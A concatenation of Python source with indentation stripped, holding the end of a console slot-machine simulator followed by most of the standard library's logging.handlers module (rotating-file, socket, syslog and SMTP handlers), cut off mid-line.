for i in range(len(reels)):
for n in range(3,len(matrix[:,i])+1):
for j in range(len(matrix[:,i])-n+1):
if (matrix[:,i][j:j+n] == matrix[:,i][j]).all():
line.append([i+1,matrix[:,i][j]])
# lin d
for n in range(3,len(matrix[:,i])+1):
for j in range(len(matrix[:,i])-n+1):
if (diag[j:j+n] == diag[j]).all():
line.append([len(reels)+1,diag[j]])
for n in range(3,len(matrix[:,i])+1):
for j in range(len(matrix[:,i])-n+1):
if (diag2[j:j+n] == diag2[j]).all():
line.append([len(reels)+2,diag2[j]])
line = np.array(line)
return line
def update_price(amout):
global __price
__price += amout
return __price
def update_play_lines(num):
global __num_of_line
__num_of_line = num
def gui_interface(reels:List[reel],results,threads:List[threading.Thread],fx):
global __game_count,__price
current_game = 0
counter = 0
start_time = time.time()
elapsed = 0
while len(reels) > 0:
try:
if elapsed != 0:
if counter/elapsed < 25:
os.system('cls')
print("FPS: "+str(int(counter/elapsed)))
if __num_of_line > len(reels)+2:
print("Payout Lines: "+str(len(reels)+2))
else:
print("Payout Lines: "+str(__num_of_line))
print("Game: "+str(__game_count))
print("Total Payouts: "+str(__price))
print("_________THE BIG GAME MACHINE_________")
print()
for i in range(len(reels)):
# print(i+1,end='')
if 19 - int((len(reels)*5)/2)> 0:
for k in range(19 - int((len(reels)*5)/2)):
print(' ',end='')
for j in range(len(reels)):
print(" |",end='')
for m in range(len(str(max(reels[j].reel)))-len(str(reels[j].reel[i]))):
print('0',end='')
print(str(reels[j].reel[i])+"| ",end='')#str()
print()
if check_game_status(threads) == 2:
if current_game != __game_count:
current_price = 0
results = check_results(reels)
for i in range(len(results)):
if results[i][0] <= __num_of_line:
current_price += fx(results[i][1])
__price += current_price
current_game += 1
if len(results) > 0:
print(results)
print(current_price)
else:
print("Nothing!")
counter += 1
elapsed = time.time() - start_time
if elapsed >= 1:
start_time = time.time()
elapsed -= 0
counter = 0
except Exception as e:
print(e)
# input()
def simulation(number_of_runs,reels:List[reel],results,threads:List[threading.Thread],fx):
global __game_count,__price
price_list = []
while __game_count < number_of_runs:
__game_count += 1
cp = 0
for i in range(len(reels)):
reels[i].spin(random.randint(25,60),mode=1)
results = check_results(reels)
results = check_results(reels)
for i in range(len(results)):
if results[i][0] <= __num_of_line:
cp += fx(results[i][1])
price_list.append(cp)
__price += cp
# if cp > 4:
# for i in range(len(reels)):
# for j in range(len(reels)):
# print(" |"+str(reels[j].reel[i])+"| ",end='')#str()
# print()
# input()
print('game: '+str(__game_count)+'current_price: '+str(cp))
# print('total price: '+str(__price))
import matplotlib.pyplot as plt
# plt.figure()
# price_list = np.array(price_list)
# y,x = np.histogram(price_list,bins = [0,10,20,30,40,50,60,70,80,90,100,110,120,130,140,150,160,170,180,190,200])
# y = y.tolist()
# for i in range(len(y)):
# y[i] = y[i]/number_of_runs
# print(y)
# print(x)
# print(max(price_list))
# # plt.bar(price_list,bins = 8)
# plt.bar(x[0:-1],y,width=10)
# plt.plot(x[0:-1],y,color = 'orange')
return __price
|
handlers.py
|
# Copyright 2001-2015 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2015 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
try:
import threading
except ImportError: #pragma: no cover
threading = None
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
def __init__(self, filename, mode, encoding=None, delay=False):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.mode = mode
self.encoding = encoding
self.namer = None
self.rotator = None
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except Exception:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
# Issue 18940: A file may not have been created if delay is True.
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0, encoding=None, delay=False):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
BaseRotatingHandler.__init__(self, filename, mode, encoding, delay)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + ".1")
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0, encoding=None, delay=False, utc=False, atTime=None):
BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
self.atTime = atTime
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
currentDay = t[6]
# r is the number of seconds left between now and the next rotation
if self.atTime is None:
rotate_ts = _MIDNIGHT
else:
rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
self.atTime.second)
r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
if r < 0:
# Rotate time is before the current time (for example when
# self.rotateAt is 13:45 and it now 14:15), rotation is
# tomorrow.
r += _MIDNIGHT
currentDay = (currentDay + 1) % 7
result = currentTime + r
# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = currentDay # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False):
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def emit(self, record):
"""
Emit a record.
First check if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once and then fstat'ing our new fd if we opened a new log stream.
# See issue #14632: Thanks to John Mulligan for the problem report
# and patch.
try:
# stat the file by path, checking for existence
sres = os.stat(self.baseFilename)
except FileNotFoundError:
sres = None
# compare file system stat with that of our stream file handle
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
self.stream = None # See Issue #21742: _open () might fail.
# open a new file handle and get new stat info from that fd
self.stream = self._open()
self._statstream()
logging.FileHandler.emit(self, record)
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
When the attribute *closeOnError* is set to True - if a socket error
occurs, the socket is silently closed and then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
if port is None:
self.address = host
else:
self.address = (host, port)
self.sock = None
self.closeOnError = False
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
if self.port is not None:
result = socket.create_connection(self.address, timeout=timeout)
else:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
try:
result.connect(self.address)
except OSError:
result.close() # Issue 19182
raise
return result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = True
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except OSError:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
self.sock.sendall(s)
except OSError: #pragma: no cover
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg or args are objects, they may not be
# available on the receiving end. So we convert the msg % args
# to a string, save it as msg and zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
return slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.sock
if sock:
self.sock = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
if self.port is None:
family = socket.AF_UNIX
else:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, self.address)
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"security": LOG_AUTH, # DEPRECATED
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used. If socktype is
specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of None, in which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
if isinstance(address, str):
self.unixsocket = True
self._connect_unixsocket(address)
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_INET, socktype)
if socktype == socket.SOCK_STREAM:
self.socket.connect(address)
self.socktype = socktype
self.formatter = None
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
if self.socktype is not None:
# user didn't specify falling back, so fail
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
raise
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
def close (self):
"""
Closes the socket.
"""
self.acquire()
try:
self.socket.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = True # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
try:
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\000'
# We need to convert record level to lowercase, maybe this will
# change in the future.
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
if self.unixsocket:
try:
self.socket.send(msg)
except OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except Exception:
self.handleError(record)
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
A timeout in seconds can be specified for the SMTP connection (the
default is one second).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.utils import formatdate
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = self.format(record)
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\nDate: %s\r\n\r\n%s" % (
self.fromaddr,
",".join(self.toaddrs),
self.getSubject(record),
formatdate(), msg)
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.sendmail(self.fromaddr, self.toaddrs, msg)
smtp.quit()
except Exception:
self.handleError(record)
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
